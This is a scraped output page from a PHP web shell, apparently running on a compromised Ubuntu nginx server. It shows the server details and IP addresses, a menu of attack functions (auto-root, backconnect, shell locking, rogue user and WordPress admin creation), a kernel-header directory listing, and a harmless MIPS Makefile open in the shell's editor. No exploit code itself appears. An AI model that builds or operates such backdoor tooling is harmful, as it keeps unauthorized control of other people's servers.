Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
arch /
mips /
[ HOME SHELL ]
Name
Size
Permission
Action
alchemy
[ DIR ]
drwxr-xr-x
ar7
[ DIR ]
drwxr-xr-x
ath25
[ DIR ]
drwxr-xr-x
ath79
[ DIR ]
drwxr-xr-x
bcm47xx
[ DIR ]
drwxr-xr-x
bcm63xx
[ DIR ]
drwxr-xr-x
bmips
[ DIR ]
drwxr-xr-x
boot
[ DIR ]
drwxr-xr-x
cavium-octeon
[ DIR ]
drwxr-xr-x
cobalt
[ DIR ]
drwxr-xr-x
crypto
[ DIR ]
drwxr-xr-x
dec
[ DIR ]
drwxr-xr-x
fw
[ DIR ]
drwxr-xr-x
generic
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
ingenic
[ DIR ]
drwxr-xr-x
jazz
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
kvm
[ DIR ]
drwxr-xr-x
lantiq
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
loongson2ef
[ DIR ]
drwxr-xr-x
loongson32
[ DIR ]
drwxr-xr-x
loongson64
[ DIR ]
drwxr-xr-x
math-emu
[ DIR ]
drwxr-xr-x
mm
[ DIR ]
drwxr-xr-x
mti-malta
[ DIR ]
drwxr-xr-x
n64
[ DIR ]
drwxr-xr-x
net
[ DIR ]
drwxr-xr-x
netlogic
[ DIR ]
drwxr-xr-x
pci
[ DIR ]
drwxr-xr-x
pic32
[ DIR ]
drwxr-xr-x
power
[ DIR ]
drwxr-xr-x
ralink
[ DIR ]
drwxr-xr-x
rb532
[ DIR ]
drwxr-xr-x
sgi-ip22
[ DIR ]
drwxr-xr-x
sgi-ip27
[ DIR ]
drwxr-xr-x
sgi-ip30
[ DIR ]
drwxr-xr-x
sgi-ip32
[ DIR ]
drwxr-xr-x
sibyte
[ DIR ]
drwxr-xr-x
sni
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
txx9
[ DIR ]
drwxr-xr-x
vdso
[ DIR ]
drwxr-xr-x
vr41xx
[ DIR ]
drwxr-xr-x
Kbuild
612
B
-rw-r--r--
Kbuild.platforms
1.64
KB
-rw-r--r--
Kconfig
85.76
KB
-rw-r--r--
Kconfig.debug
5.55
KB
-rw-r--r--
Makefile
19.42
KB
-rw-r--r--
Makefile.postlink
963
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.postlink
# SPDX-License-Identifier: GPL-2.0 # =========================================================================== # Post-link MIPS pass # =========================================================================== # # 1. Check that Loongson3 LL/SC workarounds are applied correctly # 2. Insert relocations into vmlinux PHONY := __archpost __archpost: -include include/config/auto.conf include scripts/Kbuild.include CMD_LS3_LLSC = arch/mips/tools/loongson3-llsc-check quiet_cmd_ls3_llsc = LLSCCHK $@ cmd_ls3_llsc = $(CMD_LS3_LLSC) $@ CMD_RELOCS = arch/mips/boot/tools/relocs quiet_cmd_relocs = RELOCS $@ cmd_relocs = $(CMD_RELOCS) $@ # `@true` prevents complaint when there is nothing to be done vmlinux: FORCE @true ifeq ($(CONFIG_CPU_LOONGSON3_WORKAROUNDS),y) $(call if_changed,ls3_llsc) endif ifeq ($(CONFIG_RELOCATABLE),y) $(call if_changed,relocs) endif %.ko: FORCE @true clean: @true PHONY += FORCE clean FORCE: .PHONY: $(PHONY)
Close